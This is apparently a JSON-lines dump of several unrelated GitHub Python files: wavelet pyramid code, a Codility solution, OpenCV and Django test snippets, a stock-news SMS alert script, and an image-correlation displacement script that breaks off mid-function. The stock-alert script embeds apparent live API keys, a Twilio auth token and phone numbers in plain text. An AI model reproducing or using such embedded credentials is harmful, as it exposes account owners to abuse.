def lowest_level_dim(self):\n return np.array((self.lev_h[self.levels-1], self.lev_w[self.levels-1]))\n\n def build_scf(self, im):\n \"\"\"\n Decompose an image using the preallocated filter masks\n\n :param im:\n :param export2matlab:\n :return:\n \"\"\"\n # process the top layer filters\n imdft = np.fft.fftshift(np.fft.fft2(im).astype(self.complex_data_dtype))\n self.lodft[0][:, :] = (imdft * self.lo0mask).astype(self.complex_data_dtype)\n\n for level in range(self.levels):\n # if in lowest level\n\n if level == self.levels-1:\n this_band_dft = [None] * self.nbands\n for band in range(self.nbands):\n this_band_dft[band] = (np.power(self.i, (self.nbands-1))) * self.lodft[level] * self.angle_mask[level][band] * self.high_mask[level]\n self.coefficients[band] = np.fft.ifft2(np.fft.ifftshift(this_band_dft[band]).astype(self.complex_data_dtype))\n # print '####### Debug pyramid decomposition ########'\n # print level\n # print np.shape(this_band_dft[band])\n # Exit when the lowest level is reached and return these bands\n return self.coefficients\n\n lo_temp = self.lodft[level][self.lostart[level, 0]:self.loend[level, 0]+1,\n self.lostart[level, 1]:self.loend[level, 1]+1]\n # print '####### Debug pyramid decomposition ########'\n # print level\n # print np.shape(self.lodft[level + 1])\n # print np.shape(lo_temp)\n # print np.shape(self.lo_mask[level])\n self.lodft[level+1][:, :] = lo_temp * self.lo_mask[level]\n\n def plot_lo_masks(self):\n \"\"\"\n plots the low pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n\n qty = len(self.lo_mask)\n ax = [None] * qty\n\n fig, axs = plt.subplots(qty)\n\n for idx in range(qty):\n ax[idx] = axs[idx].matshow(self.lo_mask[idx])\n\n plt.show()\n\n def plot_high_masks(self):\n \"\"\"\n plots the high pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n qty = len(self.high_mask)\n ax = [None] * qty\n\n fig, axs = plt.subplots(qty)\n\n for idx in range(qty):\n ax[idx] = axs[idx].matshow(self.high_mask[idx])\n\n plt.show()\n\n def plot_angle_masks_b1(self):\n \"\"\"\n plots the first orientation of band pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n ax = [None] * self.levels\n\n fig, axs = plt.subplots(self.levels)\n\n for idx in range(self.levels):\n ax[idx] = axs[idx].matshow(self.angle_mask[idx][0])\n\n plt.show()\n\n\nclass Steerable_complex_wavelet_pyramid(Scy_pyr_builder_base):\n\n def __init__(self,\n im_h,\n im_w,\n levels=5,\n nbands=2,\n ):\n\n super(Steerable_complex_wavelet_pyramid, self).__init__(im_h=im_h, im_w=im_w, levels=levels, nbands=nbands)\n\n self.generate_radial_transition_function()\n self.preprocess_masks()\n\n def preprocess_masks(self):\n \"\"\"\n Preallocates filter masks once at initialisation time to save time for each image decomposition.\n This is a recursive process.\n :return:\n \"\"\"\n # collect object vals that will be used recursively in this function\n this_log_rad = copy(self.log_rad)\n this_angle = copy(self.angle)\n\n for level in range(self.levels):\n\n self.high_mask[level] = self.point_op(this_log_rad, self.Yrcos, self.Xrcos_low[level], self.delta_Xrcos)\n for band in range(self.nbands):\n self.angle_mask[level][band] = self.point_op(this_angle, self.Ycosn,\n self.Xcosn[0] + np.pi * (band) / self.nbands,\n self.Xcosn[1] - self.Xcosn[0])\n\n this_im_dims = np.array((self.lev_h[level], self.lev_w[level]))\n\n ctr = np.ceil((this_im_dims + 0.5) / 2.0)\n lodims = np.ceil((this_im_dims - 0.5) / 2.0)\n loctr = np.ceil((lodims + 0.5) / 2.0)\n self.lostart[level, :] = ctr - loctr # + 1 - 1\n self.loend[level, :] = self.lostart[level, :] + lodims - 1\n\n self.lostart = self.lostart.astype(np.int)\n self.loend = self.loend.astype(np.int)\n\n low_slice = slice(self.lostart[level, 0], self.loend[level, 0]+1, 1)\n hi_slice = slice(self.lostart[level, 1], self.loend[level, 1]+1, 1)\n\n this_log_rad = this_log_rad[low_slice, hi_slice]\n this_angle = this_angle[low_slice, hi_slice]\n self.lo_mask[level] = self.point_op(this_log_rad, self.YIrcos, self.Xrcos_low[level], self.delta_Xrcos)\n\n def point_op(self, data, Y, x, x_delta):\n \"\"\"\n Performs the \"Point operation function\" (PointOp) from Simoncelli's toolbox. Note, we don't use the optimised\n C-code because we only perform this once at initialisation time\n :param data: image\n :param Y: look up table\n :param x: origin\n :param x_delta: increment\n :return: image data linearly interpolated to new range\n \"\"\"\n X = x + x_delta * np.arange(np.shape(Y)[0])\n f = interp1d(X, Y, fill_value=\"extrapolate\")\n return np.reshape(f(data.ravel()), np.shape(data))\n\n def generate_radial_transition_function(self, lutsize=1024):\n \"\"\"\n :param lutsize:\n :param plot_filters:\n :return:\n \"\"\"\n ctr_x = np.int(np.floor((self.im_h) / 2.0))\n ctr_y = np.int(np.floor((self.im_w) / 2.0))\n xramp, yramp = np.meshgrid((np.arange(self.im_w)-ctr_y) / (self.im_w/2.0), (np.arange(self.im_h) - ctr_x) / (self.im_h / 2.0))\n self.angle = np.arctan2(yramp, xramp)\n self.log_rad = np.linalg.norm( np.dstack((xramp, yramp)), axis=2) # np.linalg.norm((xramp, yramp))\n self.log_rad[ctr_x, ctr_y] = self.log_rad[ctr_x, ctr_y -1]\n self.log_rad = np.log2(self.log_rad)\n\n # Radial transition function(a raised cosine in log-frequency):\n [self.Xrcos, self.Yrcos] = self.rcosFn(self.twidth, (-self.twidth / 2.0), (0, 1))\n self.delta_Xrcos = self.Xrcos[1] - self.Xrcos[0]\n\n self.Xrcos_low = np.zeros(self.levels)\n self.Xrcos_hi = np.zeros_like(self.Xrcos_low)\n\n decrement = np.log2(2)\n self.Xrcos_low[0] = self.Xrcos[0] - decrement\n self.Xrcos_hi[0] = self.Xrcos[1] - decrement\n for idx in range(1, self.levels):\n self.Xrcos_low[idx] = self.Xrcos_low[idx - 1] - decrement\n self.Xrcos_hi[idx] = self.Xrcos_hi[idx - 1] - decrement\n\n self.Yrcos = np.sqrt(self.Yrcos)\n self.YIrcos = np.abs(np.sqrt(1.0 - np.square(self.Yrcos)))\n\n self.lo0mask = self.point_op(self.log_rad, self.YIrcos, self.Xrcos[0], self.delta_Xrcos)\n\n self.Xcosn = np.pi * ( np.arange(-2*lutsize-1, lutsize+2, 1) ) / lutsize # [-2 * pi:pi]\n self.alfa = ( (np.pi + self.Xcosn) % (2 * np.pi) ) - np.pi\n self.const = (np.power((2*self.order),2)) * ( np.square(factorial(self.order, exact=True)) ) / (self.nbands * factorial(2 * self.order, exact=True))\n\n self.Ycosn = 2 * np.sqrt(self.const) * ( np.power(np.cos(self.Xcosn), self.order)) * (np.abs(self.alfa) < np.pi / 2)\n\n def rcosFn(self, width=1, position=1.0, values=np.array((0,1))):\n '''Return a lookup table containing a \"raised cosine\" soft threshold function\n Y = VALUES(1) + (VALUES(2)-VALUES(1)) * cos^2( PI/2 * (X - POSITION + WIDTH)/WIDTH )\n this lookup table is suitable for use by `pointOp`\n Arguments\n ---------\n width : `float`\n the width of the region over which the transition occurs\n position : `float`\n the location of the center of the threshold\n values : `tuple`\n 2-tuple specifying the values to the left and right of the transition.\n Returns\n -------\n X : `np.array`\n the x values of this raised cosine\n Y : `np.array`\n the y values of this raised cosine\n '''\n sz = 256 # arbitrary!\n X = np.pi * np.arange(-sz - 1, 2) / (2 * sz)\n Y = values[0] + (values[1] - values[0]) * np.cos(X) ** 2\n # make sure end values are repeated, for extrapolation...\n Y[0] = Y[1]\n Y[sz + 2] = Y[sz + 1]\n X = position + (2 * width / np.pi) * (X + np.pi / 4)\n return X, Y\n\n\ndef speed_test(repeats=1000):\n\n from time import time\n from definitions_cwssim import IM_SEQUENCES\n from os import path\n\n p_build = Steerable_complex_wavelet_pyramid(im_h=150, im_w=235)\n im = cv2.imread(path.join(IM_SEQUENCES, 'fwd_drone', 'fwd_drone_1.jpg'), 0)\n\n t_start = time()\n print ('performing speed test with {} repeats'.format(repeats))\n for idx in range(repeats):\n coefficients = p_build.build_scf(im)\n t_end = time()\n t_mean = (t_end - t_start) / repeats\n print ('mean processing time was {}s'.format(t_mean))\n\n\ndef plot_masks(im_h=150, im_w=235):\n \"\"\"\n Plots the preallocated masks of the steerable pyramid\n :param im_h:\n :param im_w:\n :return:\n \"\"\"\n py = Steerable_complex_wavelet_pyramid(im_h=im_h, im_w=im_w)\n\n py.plot_lo_masks()\n py.plot_high_masks()\n py.plot_angle_masks_b1()\n\n\nif __name__ == '__main__':\n\n # run some diagnostic tests\n speed_test()\n plot_masks(im_h=150, im_w=235)\n","repo_name":"jannsta1/torf","sub_path":"src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"5242396734","text":"def solution(A):\n len_a = len(A)\n Dict = {}\n for index in range(len_a):\n if A[index] in Dict:\n del Dict[A[index]]\n else:\n Dict[A[index]] = 1\n for key in Dict.keys():\n return key","repo_name":"nullbyte91/codility-python","sub_path":"3.oddOccurrencesInArray.py","file_name":"3.oddOccurrencesInArray.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24665581994","text":"import numpy as np\nimport cv2 as cv\n\n# 图像-> 一个3*3的数组表示, 每个像素点由8位数值表示\nimg = np.zeros((3, 3), dtype=np.uint8)\nprint(img)\n# 每一个像素点由[B,G,R]三个数值组成的数组表示\nimg = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\nprint(img)\n# 转换图片格式,imread()会删除Alpha通道信息\nimage = cv.imread('logo.png', cv.IMREAD_GRAYSCALE)\n# bmp格式位图要求通道有8位, png要求通道8位或16位\ncv.imwrite('logo_gray.png', image)\n\n# 块操作\nimg = cv.imread('logo.png')\n","repo_name":"sunleisan/opencv","sub_path":"basic/opencv_conputer_version/chapter2.py","file_name":"chapter2.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39163942243","text":"import requests\nfrom twilio.rest import Client\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\nSTOCK_PRICE_API = \"EJXOEH3J2VREIOPP\"\nNEWS_API_KEY = \"5e12146bb6ed488adbbd58556e633383\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://gnews.io/api/v4/search\"\n\naccount_sid = 'AC36f1949ee8c4f9f1cc9259966ec747c1'\nauth_token = \"e627c7fe6489770612c1c523c6e107c0\"\n\n\n# STEP 1: Use https://www.alphavantage.co/documentation/#daily\n# When stock price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\n# Get yesterday's closing stock price. Hint: You can perform list comprehensions on Python dictionaries. e.g. [new_value for (key, value) in dictionary.items()]\nparameters = {\n \"function\": \"TIME_SERIES_DAILY_ADJUSTED\",\n \"symbol\": STOCK_NAME,\n \"apikey\": STOCK_PRICE_API\n}\n\nresponse = requests.get(STOCK_ENDPOINT, params=parameters)\nresponse.raise_for_status()\n\nstock_data = response.json()[\"Time Series (Daily)\"]\ndata_list = [value for (key, value) in stock_data.items()]\nyesterday_data = data_list[0]\nyesterday_closing_price = yesterday_data[\"4. close\"]\n\n# Get the day before yesterday's closing stock price\nday_before_yesterday_data = data_list[1]\nday_before_yesterday_closing_price = day_before_yesterday_data[\"4. close\"]\n\n# Find the positive difference between 1 and 2. e.g. 40 - 20 = -20, but the positive difference is 20. Hint: https://www.w3schools.com/python/ref_func_abs.asp\ndifference = float(yesterday_closing_price) - \\\n float(day_before_yesterday_closing_price)\n\nup_down = None\n\nif difference > 0:\n up_down = \"🔺\"\nelse:\n up_down = \"🔻\"\n\n# Work out the percentage difference in price between closing price yesterday and closing price the day before yesterday.\npercentage_difference = round(\n (difference/float(yesterday_closing_price)) * 100)\n\n# If percentage is greater than 5 then print(\"Get News\").\nif abs(percentage_difference) > 0.1:\n news_params = {\n \"q\": COMPANY_NAME,\n \"apikey\": NEWS_API_KEY,\n }\n\n response = requests.get(NEWS_ENDPOINT, news_params)\n response.raise_for_status()\n\n data = response.json()[\"articles\"]\n first_three_articles = [value for value in data[:3]]\n\n formatted_articles = [\n f\"{STOCK_NAME}: {up_down}{percentage_difference}%\\nHeadline: {article['title']}\\nBrief: {article['description']}\" for article in first_three_articles]\n for article in formatted_articles:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=article,\n from_='+12706068755',\n to='+256781876735'\n )\n print(message.status)\n","repo_name":"wakabibrian/100DaysOfCodeChallenge_Python","sub_path":"Day36/day36.py","file_name":"day36.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71990393073","text":"import os\nfrom unittest import skip\nfrom decimal import Decimal\nfrom django.test import SimpleTestCase, TestCase\n\nfrom integrations.data_feed import WineData, apply_update, get_wine_for_data\nfrom integrations.port2port import get_port2port_data, PORT2PORT_MERCHANT_NAME, update_all, \\\n update_minimum_purchase_unit\n\nfrom wine.models import MerchantWine, Merchant\nfrom wine.tests.test_util import get_a_new_wine_vintage\n\n\nclass Port2PortFeedTest(SimpleTestCase):\n\n def test_parse_feed(self):\n with open(os.path.join(os.path.dirname(__file__), 'data', 'port2port-feed.xml')) as f:\n raw_feed = f.read()\n\n data = list(get_port2port_data(raw_feed))\n self.assertEqual(3, len(data))\n wine_info = data[0]\n self.assertEqual('2261', wine_info.id)\n self.assertEqual('Arendsig 1000 Vines Viognier 2016', wine_info.name)\n self.assertEqual('https://www.port2port.wine/buy-wine/arendsig/1000-vines-viognier-2016',\n wine_info.url)\n self.assertEqual('56', wine_info.stock_amount)\n self.assertEqual('150.00', wine_info.price)\n # test unicode\n self.assertEqual('https://www.port2port.wine/buy-wine/môreson/cabernet-franc-2015', data[2].url)\n\n\nclass Port2PortFeedDbTest(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(Port2PortFeedDbTest, cls).setUpClass()\n cls.merchant = Merchant.objects.create(name=PORT2PORT_MERCHANT_NAME, priority=1)\n cls.wine_vintage = get_a_new_wine_vintage()\n cls.merchant_wine = MerchantWine.objects.create(\n merchant=cls.merchant, wine_vintage=cls.wine_vintage, minimum_purchase_unit=1,\n external_id='test_id', url='http://test.com/wine-url',\n )\n\n def test_get_no_match(self):\n self.assertEqual(None, get_wine_for_data(_make_wine_data()))\n self.assertEqual(None, get_wine_for_data(_make_wine_data(url='missing', id='missing')))\n\n def test_get_by_id(self):\n self.assertEqual(self.merchant_wine, get_wine_for_data(_make_wine_data(id=self.merchant_wine.external_id)))\n\n def test_get_by_url(self):\n self.assertEqual(self.merchant_wine, get_wine_for_data(_make_wine_data(url=self.merchant_wine.url)))\n\n def test_get_wrong_merchant(self):\n bogus_merchant_wine = MerchantWine.objects.create(\n merchant=Merchant.objects.create(name='bogus', priority=1),\n wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id='bogus_id', url='http://test.com/bogus-wine-url'\n )\n self.addCleanup(bogus_merchant_wine.delete)\n self.assertEqual(None, get_wine_for_data(_make_wine_data(id=bogus_merchant_wine.external_id,\n url=bogus_merchant_wine.url)))\n\n def test_set_external_id_if_null(self):\n url = 'test_set_external_id_if_null_url'\n id = 'test_set_external_id_if_null_id'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n url=url,\n )\n apply_update(_make_wine_data(id=id, url=url))\n wine = MerchantWine.objects.get(pk=wine.pk)\n self.assertEqual(id, wine.external_id)\n\n def test_change_url(self):\n id = 'test_change_url_id'\n url = 'test_change_url'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, url=url, available=False,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, url=url)))\n\n update_url = 'url_changed'\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, url=update_url)))\n self.assertEqual(update_url, MerchantWine.objects.get(pk=wine.pk).url)\n\n def test_allow_changing_external_id(self):\n id = 'test_allow_changing_external_id'\n apply_update(_make_wine_data(id=id, url=self.merchant_wine.url))\n wine = MerchantWine.objects.get(pk=self.merchant_wine.pk)\n self.assertEqual(id, wine.external_id)\n\n def test_set_available(self):\n id = 'test_set_available'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n available=False, external_id=id,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id)))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='0')))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n\n # set some stock and confirm changed\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='10')))\n self.assertTrue(MerchantWine.objects.get(pk=wine.pk).available)\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='20')))\n self.assertTrue(MerchantWine.objects.get(pk=wine.pk).available)\n\n # set back and confirm changed again\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, stock_amount='0')))\n self.assertFalse(MerchantWine.objects.get(pk=wine.pk).available)\n\n def test_change_price(self):\n id = 'test_change_price_id'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, price=Decimal(150.0), available=False,\n )\n self.assertEqual((wine, []), apply_update(_make_wine_data(id=id, price='150')))\n\n updated_price = '200'\n self.assertNotEqual((wine, []), apply_update(_make_wine_data(id=id, price=updated_price)))\n self.assertEqual(Decimal(updated_price), MerchantWine.objects.get(pk=wine.pk).price)\n\n def test_minimum_purchase_unit(self):\n id = 'test_minimum_purchase_unit_id'\n wine = MerchantWine.objects.create(\n merchant=self.merchant, wine_vintage=self.wine_vintage, minimum_purchase_unit=1,\n external_id=id, price=Decimal(200.0), available=False,\n )\n wine, work_done = apply_update(_make_wine_data(id=id, price='100'),\n custom_processor=update_minimum_purchase_unit)\n self.assertTrue('Set minimum purchase unit from 1 to 6' in work_done)\n self.assertEqual(6, MerchantWine.objects.get(pk=wine.pk).minimum_purchase_unit)\n\n # changing it back should explicitly not update it\n wine, work_done = apply_update(_make_wine_data(id=id, price='180'),\n custom_processor=update_minimum_purchase_unit)\n self.assertTrue('Set minimum purchase unit from 6 to 1' not in work_done)\n self.assertEqual(6, MerchantWine.objects.get(pk=wine.pk).minimum_purchase_unit)\n\n @skip('Comment out the decorator to run this test.')\n def test_print_results(self):\n update_all(debug=True)\n\n\ndef _make_wine_data(*args, **kwargs):\n kwargs['merchant_name'] = PORT2PORT_MERCHANT_NAME\n return WineData(*args, **kwargs)\n","repo_name":"FindWine/findwine","sub_path":"integrations/tests/test_port2port.py","file_name":"test_port2port.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31511080473","text":"\"\"\"\nObtain the displacement measurements from digital image correlation results.\n\"\"\"\n\nimport os\nimport time\nimport scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom examples.utility import apply_mean_filter\n\n\nCURRENT_DIRECTORY = os.path.dirname(os.path.relpath(__file__))\nCURRENT_DIRECTORY_NAME = os.path.basename(CURRENT_DIRECTORY)\n\nPARENT_DIRECTORY = os.path.dirname(CURRENT_DIRECTORY)\nPARENT_DIRECTORY_NAME = os.path.basename(PARENT_DIRECTORY)\n\n# SUBDIRECTORY_INPUT_DATA = os.path.join(\"datafiles_unprocessed\", \"displacement\", \"dic_1\")\nSUBDIRECTORY_INPUT_DATA = os.path.join(\"datafiles_unprocessed\", \"displacement\", \"dic_2\")\nDIRECTORY_INPUT_DATA = os.path.join(CURRENT_DIRECTORY, SUBDIRECTORY_INPUT_DATA)\n\n# SUBDIRECTORY_OUTPUT_DATA = os.path.join(\"datafiles_processed\", \"displacement\", \"dic_1\")\nSUBDIRECTORY_OUTPUT_DATA = os.path.join(\"datafiles_processed\", \"displacement\", \"dic_2\")\nDIRECTORY_OUTPUT_DATA = os.path.join(CURRENT_DIRECTORY, SUBDIRECTORY_OUTPUT_DATA)\nDIRECTORY_OUTPUT_FIGURES = os.path.join(CURRENT_DIRECTORY, \"results\")\n\n\nPLOT_DATA = True\nSAVE_PLOTS = False\nWRITE_DATA = False\n\nEXTENSIOMETER_PAD_WIDTH = 8.0 # Independent of experiment\nEXTENSIOMETER_WINDOW_WIDTH = 24.0 # Independent of experiment\n# EXTENSIOMETER_PAD_DISTANCE = 36.5 # Depends on experiment (NOTE: Not used)\n\nSCALE_DATA_FROM_PIXELS_TO_MM = True\nSET_DISPLACEMENTS_RELATIVE_TO_FIXED_PAD = True\nSET_COORDINATES_RELATIVE_TO_MOVING_PAD = True\n\nDISCARD_SPURIOUS_POINTS = True\nINDICES_SPURIOUS_POINTS = [1, 18, 23, 24, 30, 42, 55, 95, 99, 136, 141, 146,\n 161, 168, 169, 171, 180, 181, 182, 198, 204, 209, 216, 243, 245, 252, 268,\n 269, 279, 281, 285, 295, 307, 365, 388, 404, 433, 517, 518, 545, 557, 608,\n 627, 646, 647, 654, 655, 656, 659, 660, 664, 665, 666, 678]\n\nAPPLY_TEMPORAL_FILTER = True\nTEMPORAL_FILTERING_TIMES = 15\nTEMPORAL_FILTER_KERNELS = [\n # np.ones((9,),float),\n # np.ones((7,),float),\n np.ones((5,),float),\n np.ones((3,),float)] # Flat-top filters\n\n\ndef read_data_files(file_xt, file_yt, delimiter=None):\n\n xt = np.loadtxt(file_xt, dtype=float, delimiter=delimiter, ndmin=2)\n yt = np.loadtxt(file_yt, dtype=float, delimiter=delimiter, ndmin=2)\n\n if xt.shape != yt.shape:\n raise TypeError('Different shapes of arrays `xt` and `yt`.')\n\n nt = xt.shape[1]\n\n xt = np.split(xt, nt, axis=1)\n yt = np.split(yt, nt, axis=1)\n\n xt = [np.concatenate(xt_i, axis=1)\n for xt_i in zip(xt, yt)]\n\n return xt\n\n\ndef write_data_files(dct):\n\n if not os.path.isdir(DIRECTORY_OUTPUT_DATA):\n os.makedirs(DIRECTORY_OUTPUT_DATA)\n\n for key, val in dct.items():\n if isinstance(val, (list, tuple)):\n if not all(isinstance(val_i, np.ndarray) for val_i in val):\n raise RuntimeError('Expected the sequence to contain arrays.')\n for i, val_i in enumerate(val):\n np.savetxt(os.path.join(DIRECTORY_OUTPUT_DATA, key+f'_{i:04d}.out'), val_i)\n else:\n np.savetxt(os.path.join(DIRECTORY_OUTPUT_DATA, key+'.out'), val)\n\n\n### Read measurements\n\nx0_dic = read_data_files(\n os.path.join(DIRECTORY_INPUT_DATA, 'x0.dat'),\n os.path.join(DIRECTORY_INPUT_DATA, 'y0.dat'))\nxt_dic = read_data_files(\n os.path.join(DIRECTORY_INPUT_DATA, 'xt.dat'),\n os.path.join(DIRECTORY_INPUT_DATA, 'yt.dat'))\n\n# x0_ref_1 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'x0_ref_1.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'y0_ref_1.dat'))\n# xt_ref_1 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'xt_ref_1.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'yt_ref_1.dat'))\n\n# x0_ref_2 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'x0_ref_2.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'y0_ref_2.dat'))\n# xt_ref_2 = read_data_files(\n# os.path.join(DIRECTORY_INPUT_DATA, 'xt_ref_2.dat'),\n# os.path.join(DIRECTORY_INPUT_DATA, 'yt_ref_2.dat'))\n\npoint_spacing_x_axis = 10\n\nindices_points_left_edge = np.flatnonzero(x0_dic[0][:,0]\n < x0_dic[0][:,0].min() + point_spacing_x_axis)\n\nindices_points_right_edge = np.flatnonzero(x0_dic[0][:,0]\n > x0_dic[0][:,0].max() - point_spacing_x_axis)\n\nx0_ref_1 = [xs[indices_points_left_edge].copy() for xs in x0_dic]\nxt_ref_1 = [xs[indices_points_left_edge].copy() for xs in xt_dic]\n\nx0_ref_2 = [xs[indices_points_right_edge].copy() for xs in x0_dic]\nxt_ref_2 = [xs[indices_points_right_edge].copy() for xs in xt_dic]\n\nif x0_dic[0].shape != xt_dic[0].shape:\n raise RuntimeError\n\nif x0_ref_1[0].shape != xt_ref_1[0].shape:\n raise RuntimeError\n\nif x0_ref_2[0].shape != xt_ref_2[0].shape:\n raise RuntimeError\n\nxt_dic.insert(0, x0_dic[0])\nxt_ref_1.insert(0, x0_ref_1[0])\nxt_ref_2.insert(0, x0_ref_2[0])\n\ndel x0_dic\ndel x0_ref_1\ndel x0_ref_2\n\nnumber_of_measurements = len(xt_dic)\n\nif len(xt_ref_1) != number_of_measurements:\n raise RuntimeError('Inconsistent numbers of measurements.')\n\nif len(xt_ref_2) != number_of_measurements:\n raise RuntimeError('Inconsistent numbers of measurements.')\n\nxt_dic = xt_dic[:number_of_measurements]\nxt_ref_1 = xt_ref_1[:number_of_measurements]\nxt_ref_2 = xt_ref_2[:number_of_measurements]\n\n\n### Temporal filtering\n\nassert isinstance(xt_dic, list)\nassert isinstance(xt_ref_1, list)\nassert isinstance(xt_ref_2, list)\n\nif APPLY_TEMPORAL_FILTER:\n for w_i in TEMPORAL_FILTER_KERNELS:\n for _ in range(TEMPORAL_FILTERING_TIMES):\n apply_mean_filter(w_i, xt_dic)\n apply_mean_filter(w_i, xt_ref_1)\n apply_mean_filter(w_i, xt_ref_2)\n\n\n### Scale measurements from px to mm\n\nif SCALE_DATA_FROM_PIXELS_TO_MM:\n\n # NOTE: Using the vertical scale rather than the horizontal scale is more robust\n # because the extensometer width is known whereas the pad distance is arbitrary.\n\n _dy_ref_1 = xt_ref_1[0][:,1].max() - xt_ref_1[0][:,1].min()\n _dy_ref_2 = xt_ref_2[0][:,1].max() - xt_ref_2[0][:,1].min()\n\n _dy = (_dy_ref_1 + _dy_ref_2) * 0.5\n scale = EXTENSIOMETER_PAD_WIDTH / _dy\n\n for _xs in xt_dic:\n _xs *= scale\n\n for _xs in xt_ref_1:\n _xs *= scale\n\n for _xs in xt_ref_2:\n _xs *= scale\n\n\n### Compute pad positions\n\nindex_ymax = np.argmax(xt_ref_1[0][:,1])\nindex_ymin = np.argmin(xt_ref_1[0][:,1])\n\nxt_pad_mov = [(xs[index_ymax] + xs[index_ymin]) * 0.5 for xs in xt_ref_1]\n\nindex_ymax = np.argmax(xt_ref_2[0][:,1])\nindex_ymin = np.argmin(xt_ref_2[0][:,1])\n\nxt_pad_fix = [(xs[index_ymax] + xs[index_ymin]) * 0.5 for xs in xt_ref_2]\n\n\n### Set measurements relative to fixed pad\n\nif SET_DISPLACEMENTS_RELATIVE_TO_FIXED_PAD:\n\n for _xs_dic, _xi_pad_fix in zip(xt_dic, xt_pad_fix):\n _xs_dic -= _xi_pad_fix\n\n for _xs_pad_mov, _xi_pad_fix in zip(xt_pad_mov, xt_pad_fix):\n _xs_pad_mov -= _xi_pad_fix\n\n for _xi in xt_pad_fix:\n _xi[:] = 0.0\n\n\n### Set initial coordinates relative to moving pad\n\nif SET_COORDINATES_RELATIVE_TO_MOVING_PAD:\n\n _xi_pad_mov = xt_pad_mov[0].copy()\n\n for _xs in xt_dic:\n _xs -= _xi_pad_mov\n\n for _xs in xt_pad_mov:\n _xs -= _xi_pad_mov\n\n for _xs in xt_pad_fix:\n _xs -= _xi_pad_mov\n\n\n### Remove spurious points\n\ndef get_indices_compliment(indices, maxsize):\n mask = np.ones((maxsize,), bool)\n mask[indices] = False\n return np.flatnonzero(mask)\n\nindices_points_genuine = list(range(len(xt_dic[0])))\nindices_points_spurious = INDICES_SPURIOUS_POINTS\n\nif DISCARD_SPURIOUS_POINTS:\n indices_points_genuine = get_indices_compliment(\n indices_points_spurious, len(xt_dic[0]))\n\nxt_dic_spr = []\n\nfor xi_dic in xt_dic:\n xt_dic_spr.append(xi_dic[indices_points_spurious,:].copy())\n\nif DISCARD_SPURIOUS_POINTS:\n for i, xi_dic in enumerate(xt_dic):\n xt_dic[i] = xi_dic[indices_points_genuine,:].copy()\n\n\n### Displacements\n\nx0_dic = xt_dic[0].copy()\nx0_pad_mov = xt_pad_mov[0].copy()\nx0_pad_fix = xt_pad_fix[0].copy()\n\nut_dic = [xs - x0_dic for xs in xt_dic]\nut_pad_mov = [xs - x0_pad_mov for xs in xt_pad_mov]\nut_pad_fix = [xs - x0_pad_fix for xs in xt_pad_fix]\n\n\n### Extensometer dimensions\n\nextensiometer_window_width = EXTENSIOMETER_WINDOW_WIDTH\nextensiometer_pad_distance = x0_pad_fix[0] - x0_pad_mov[0]\n\n\n### Export these data\n\nmeasurements = {\n 'x_dic': x0_dic,\n 'u_dic': ut_dic,\n 'x_pad_mov': np.array(x0_pad_mov, ndmin=2),\n 'u_pad_mov': np.array(ut_pad_mov, ndmin=2),\n 'x_pad_fix': np.array(x0_pad_fix, ndmin=2),\n 'u_pad_fix': np.array(ut_pad_fix, ndmin=2),\n }\n\n\n### Plotting\n\ndef plot_data_frame(index=-1, title=None, ax=None, annotate=False):\n\n if ax is None:\n fh = plt.figure(); fh.clear()\n ax = fh.add_subplot(1,1,1)\n\n elif not isinstance(ax, plt.Axes):\n raise TypeError('Parameter `ax` must be of type `plt.Axes`.')\n\n ax.scatter(xt_dic[0][:,0],\n xt_dic[0][:,1],\n c=\"k\", s=10, marker='.')\n\n ax.scatter(xt_dic[index][:,0],\n xt_dic[index][:,1],\n c='r', s=10, marker='o', alpha=0.5)\n\n if annotate:\n\n ax.scatter(xt_dic_spr[0][:,0],\n 